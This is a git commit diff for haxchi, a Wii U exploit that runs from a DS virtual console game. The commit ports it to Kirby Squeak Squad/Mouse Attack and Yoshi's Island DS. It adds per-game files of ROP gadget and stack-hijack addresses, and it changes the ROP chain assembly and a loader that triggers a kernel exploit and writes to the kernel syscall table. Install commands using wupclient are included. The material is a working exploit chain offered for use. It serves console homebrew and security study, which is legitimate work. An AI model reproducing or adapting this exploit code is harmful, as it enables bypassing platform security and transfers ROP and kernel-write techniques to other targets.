added support for kirby squeak squad/mouse attack as well as yoshis island ds

This commit is contained in:
FIX94 2016-11-11 06:47:56 +01:00
parent ad8d63f081
commit e80cd483b9
10 changed files with 274 additions and 90 deletions

View File

@ -1,18 +1,50 @@
.PHONY := all code550.bin .PHONY := all code550.bin
all: WUP-N-DAAP.nds all: brainage kirby yoshids brainage.zip kirby.zip yoshids.zip
code550.bin: brainage: setup_brainage brainage.nds
kirby: setup_kirby kirby.nds
yoshids: setup_yoshids yoshids.nds
setup_brainage:
rm -f *.bin
@cd hbl_loader && make && cd .. @cd hbl_loader && make && cd ..
@cp -f brainage_defs.s defines.s
haxchi_rop_hook.bin haxchi_rop.bin: code550.bin haxchi_rop.s setup_kirby:
rm -f *.bin
@cd hbl_loader && make && cd ..
@cp -f kirby_defs.s defines.s
setup_yoshids:
rm -f *.bin
@cd hbl_loader && make && cd ..
@cp -f yoshids_defs.s defines.s
brainage.nds:
armips haxchi_rop.s armips haxchi_rop.s
WUP-N-DAAP.nds: haxchi_rop_hook.bin haxchi_rop.bin haxchi.s
armips haxchi.s armips haxchi.s
zip -JXjq9 rom.zip WUP-N-DAAP.nds
kirby.nds:
armips haxchi_rop.s
armips haxchi.s
yoshids.nds:
armips haxchi_rop.s
armips haxchi.s
brainage.zip:
zip -JXjq9 brainage.zip brainage.nds
kirby.zip:
zip -JXjq9 kirby.zip kirby.nds
yoshids.zip:
zip -JXjq9 yoshids.zip yoshids.nds
clean: clean:
@rm -f *.bin WUP-N-DAAP.nds rom.zip @rm -f *.bin brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip
@cd hbl_loader && make clean && cd .. @cd hbl_loader && make clean && cd ..
@echo "all cleaned up !" @echo "all cleaned up !"

View File

@ -1,18 +1,25 @@
# haxchi # haxchi
This is a ported version of the haxchi exploit created by smea and others for the european release of brain training. This is a ported version of the haxchi exploit created by smea and others for all sorts of different ds vc games.
In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things. In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things.
## install process ## install process
haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do: haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do:
``` ```
w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/10179C00/content/0010/rom.zip") w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip")
``` ```
of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using: of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using:
``` ```
w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/10179C00/content/0010/rom.zip") w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip")
``` ```
make sure to replace YOUR_GAME_TITLE_ID with one of the following:
10179B00 - US Brain Age
10179C00 - PAL Brain Training
10198A00 - US Yoshi's Island DS
10198A00 - PAL Yoshi's Island DS
101A5600 - US Kirby Squeak Squad
101A5700 - PAL Kirby Mouse Attack
## contents ## contents

41
brainage_defs.s Normal file
View File

@ -0,0 +1,41 @@
FILE_NDS_NAME equ "brainage.nds"
; game stack return address
HAX_TARGET_ADDRESS equ (0x1076FAA4)
HACHI_APPLICATION_PTR equ (0x10A6E038)
ARM9_ROM_LOCATION equ (0x16220400)
ARM7_ROM_MEM2_START equ (0xEBDDFC00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
BCTRL equ (RPX_OFFSET + 0x02208EA4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201BD28)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC)
_START_EXIT equ (RPX_OFFSET + 0x02022A70)

19
coreinit.s Normal file
View File

@ -0,0 +1,19 @@
; constants for position calcs
COREINIT_OFFSET equ (- 0xFE3C00)
; coreinit gadgets
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
; coreinit functions
OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET)
OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET)
OSFATAL equ (0x02015218 + COREINIT_OFFSET)

View File

@ -1,8 +1,7 @@
.create "WUP-N-DAAP.nds", 0 .include "defines.s"
.nds .create FILE_NDS_NAME, 0
; game stack return address .nds
hax_target_address equ 0x1076FAA4
.org 0x000 .org 0x000
.ascii "HAXCHI" ; Game Title .ascii "HAXCHI" ; Game Title
@ -19,7 +18,7 @@ hax_target_address equ 0x1076FAA4
.word arm9_data_end - arm9_data ; ARM9 size .word arm9_data_end - arm9_data ; ARM9 size
.word arm7_data ; ARM7 rom_offset .word arm7_data ; ARM7 rom_offset
.word 0x2000000 ; ARM7 entry_address .word 0x2000000 ; ARM7 entry_address
.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address .word ARM7_ROM_MEM2_START + HAX_TARGET_ADDRESS ; ARM7 ram_address
.word arm7_data_end - arm7_data ; ARM7 size .word arm7_data_end - arm7_data ; ARM7 size
.org 0x080 .org 0x080

View File

@ -1,64 +1,11 @@
.include "coreinit.s"
; game stack return address .include "defines.s"
hax_target_address equ 0x1076FAA4
; constants for position calcs
COREINIT_OFFSET equ (- 0xFE3C00)
RPX_OFFSET equ (0x01800000)
SYSAPP_OFFSET equ (0x01B75D00)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
BCTRL equ (RPX_OFFSET + 0x02208EA4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
; functions used from game and libraries
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x201BD28)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC)
_START_EXIT equ (RPX_OFFSET + 0x02022A70)
_SYSLAUNCHMIISTUDIO equ (SYSAPP_OFFSET + 0x020019D4)
OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET)
OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET)
OSFATAL equ (0x02015218 + COREINIT_OFFSET)
; more useful definitions ; more useful definitions
CODEGEN_ADR equ 0x01800000 CODEGEN_ADR equ (0x01800000)
HACHI_APPLICATION_PTR equ (0x10A6E038) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000)
NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000)
NERD_THREAD0OBJECT equ (hax_target_address - 0x1000)
NERD_THREAD2OBJECT equ (hax_target_address - 0x2000)
.macro set_sp,v .macro set_sp,v
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
@ -155,17 +102,19 @@ NERD_THREAD2OBJECT equ (hax_target_address - 0x2000)
; hacked from arm7 ram offset (unsafe, game stack pointer) ; hacked from arm7 ram offset (unsafe, game stack pointer)
.create "haxchi_rop_hook.bin", hax_target_address .create "haxchi_rop_hook.bin", HAX_TARGET_ADDRESS
.arm.big .arm.big
rop_hook_start: rop_hook_start:
;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
; move stack pointer to safe area ; move stack pointer to safe area
set_sp (rop_start - 4) set_sp (rop_start - 4)
.Close .Close
; original game arm9 ram offset (safe, normally arm9 code) ; original game arm9 ram offset (safe, normally arm9 code)
.create "haxchi_rop.bin", 0x16220400 .create "haxchi_rop.bin", ARM9_ROM_LOCATION
.arm.big .arm.big
rop_start: rop_start:
@ -209,7 +158,7 @@ rop_start:
; prepare r31 to be a valid value for the next call ; prepare r31 to be a valid value for the next call
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
.word 0xDEADBABE ; r30 .word 0xDEADBABE ; r30
.word (0x1076FAA4-0x3000) ; r31 (has to be valid here) .word (HAX_TARGET_ADDRESS-0x3000) ; r31 (has to be valid here)
.word 0xDEAD0001 ; garbage .word 0xDEAD0001 ; garbage
; loads the required value for the addition onto r3 later on ; loads the required value for the addition onto r3 later on
.word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR .word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR
@ -253,9 +202,6 @@ rop_start:
call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0 call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
call_func CORE_SHUTDOWN, 0, 0, 0, 0 call_func CORE_SHUTDOWN, 0, 0, 0, 0
; on exit we want to go into mii studio directly
call_func _SYSLAUNCHMIISTUDIO, 0x0, 0x0, 0x0, 0x0
; prepare system for foreground release ; prepare system for foreground release
call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0 call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0

View File

@ -2,10 +2,11 @@ PATH := $(DEVKITPPC)/bin:$(PATH)
PREFIX ?= powerpc-eabi- PREFIX ?= powerpc-eabi-
CC = $(PREFIX)gcc CC = $(PREFIX)gcc
AS = $(PREFIX)gcc AS = $(PREFIX)gcc
CFLAGS = -std=gnu99 -Os -nostdinc -fno-builtin CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g
ASFLAGS = -mregnames -x assembler-with-cpp ASFLAGS = -mregnames -x assembler-with-cpp
LD = $(PREFIX)ld LD = $(PREFIX)ld
LDFLAGS=-Ttext 1800000 --oformat binary -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc OBJCOPY = $(PREFIX)objcopy
LDFLAGS=-Ttext 1800000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc
OBJDUMP ?= $(PREFIX)objdump OBJDUMP ?= $(PREFIX)objdump
project := . project := .
root := $(CURDIR) root := $(CURDIR)
@ -35,11 +36,13 @@ main: sd_loader.h
$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
cp -r $(root)/*.o $(build) cp -r $(root)/*.o $(build)
rm $(root)/*.o rm $(root)/*.o
$(LD) -s -o ../code$(FIRMWARE).bin $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) $(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map
$(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin
clean: clean:
rm -rf $(build) rm -rf $(build)
rm -rf sd_loader.h rm -rf sd_loader.h
rm -rf code$(FIRMWARE).elf code.map
make clean -C sd_loader make clean -C sd_loader
print_stats: print_stats:

View File

@ -41,15 +41,19 @@ extern void KernelPatches(void);
/* ****************************************************************** */ /* ****************************************************************** */
void __main(void) void __main(void)
{ {
/* Quit ongoing menu load music */
unsigned int sound_handle = 0; unsigned int sound_handle = 0;
OSDynLoad_Acquire("snd_core.rpl", &sound_handle); OSDynLoad_Acquire("sndcore2.rpl", &sound_handle);
void (* AXInit)(); if(sound_handle == 0)
void (* AXQuit)(); {
OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit); /* Quit ongoing menu load music */
OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit); OSDynLoad_Acquire("snd_core.rpl", &sound_handle);
AXInit(); void (* AXInit)();
AXQuit(); void (* AXQuit)();
OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit);
OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit);
AXInit();
AXQuit();
}
/* Get coreinit handle and keep it in memory */ /* Get coreinit handle and keep it in memory */
unsigned int coreinit_handle; unsigned int coreinit_handle;
@ -82,6 +86,57 @@ void __main(void)
if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0) if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0)
run_kexploit(&private_data); run_kexploit(&private_data);
/* Prepare for _SYSLaunchMiiStudio thread */
int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, unsigned int stack, unsigned int stack_size, int priority, unsigned short attr);
int (*OSResumeThread)(void *thread);
int (*OSIsThreadTerminated)(void *thread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
/* Allocate a stack for the thread */
void *stack = private_data.MEMAllocFromDefaultHeapEx(0x1000, 0x20);
/* Create the thread variable */
void *thread = private_data.MEMAllocFromDefaultHeapEx(0x1000, 8);
if(!thread || !stack)
ExitFailure(&private_data, "Thread memory allocation failed. Exit and re-enter browser.");
/* Quickly find _SYSLaunchMiiStudio */
unsigned int sysapp_handle;
void (*_SYSLaunchMiiStudio)(void) = 0;
OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle);
OSDynLoad_FindExport(sysapp_handle, 0, "_SYSLaunchMiiStudio", &_SYSLaunchMiiStudio);
if(_SYSLaunchMiiStudio == (void*)0)
OSFatal("_SYSLaunchMiiStudio is not there?");
/* Do _SYSLaunchMiiStudio in core 1 */
int ret = OSCreateThread(thread, _SYSLaunchMiiStudio, 0, (void*)0, (unsigned int)stack+0x1000, 0x1000, 0, 0x1A);
if (ret == 0)
ExitFailure(&private_data, "Failed to create thread. Exit and re-enter browser.");
/* Schedule it for execution */
OSResumeThread(thread);
/* Can not use OSJoinThread, which hangs for some reason, so we use a detached one and wait for it to terminate */
while(OSIsThreadTerminated(thread) == 0)
{
asm volatile (
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
);
}
/* Free thread memory and stack */
private_data.MEMFreeToDefaultHeap(thread);
private_data.MEMFreeToDefaultHeap(stack);
/* setup kernel copy data syscall */ /* setup kernel copy data syscall */
kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData); kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData);

41
kirby_defs.s Normal file
View File

@ -0,0 +1,41 @@
FILE_NDS_NAME equ "kirby.nds"
; game stack return address
HAX_TARGET_ADDRESS equ (0x107968AC)
HACHI_APPLICATION_PTR equ (0x10c8c938)
ARM9_ROM_LOCATION equ (0x1643F200)
ARM7_ROM_MEM2_START equ (0xEBBC0E00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
BCTRL equ (RPX_OFFSET + 0x02206FBC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
_START_EXIT equ (RPX_OFFSET + 0x0202693C)

41
yoshids_defs.s Normal file
View File

@ -0,0 +1,41 @@
FILE_NDS_NAME equ "yoshids.nds"
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B52C)
HACHI_APPLICATION_PTR equ (0x10C91938)
ARM9_ROM_LOCATION equ (0x16444200)
ARM7_ROM_MEM2_START equ (0xEBBBBE00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
BCTRL equ (RPX_OFFSET + 0x02206EB4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
_START_EXIT equ (RPX_OFFSET + 0x02026944)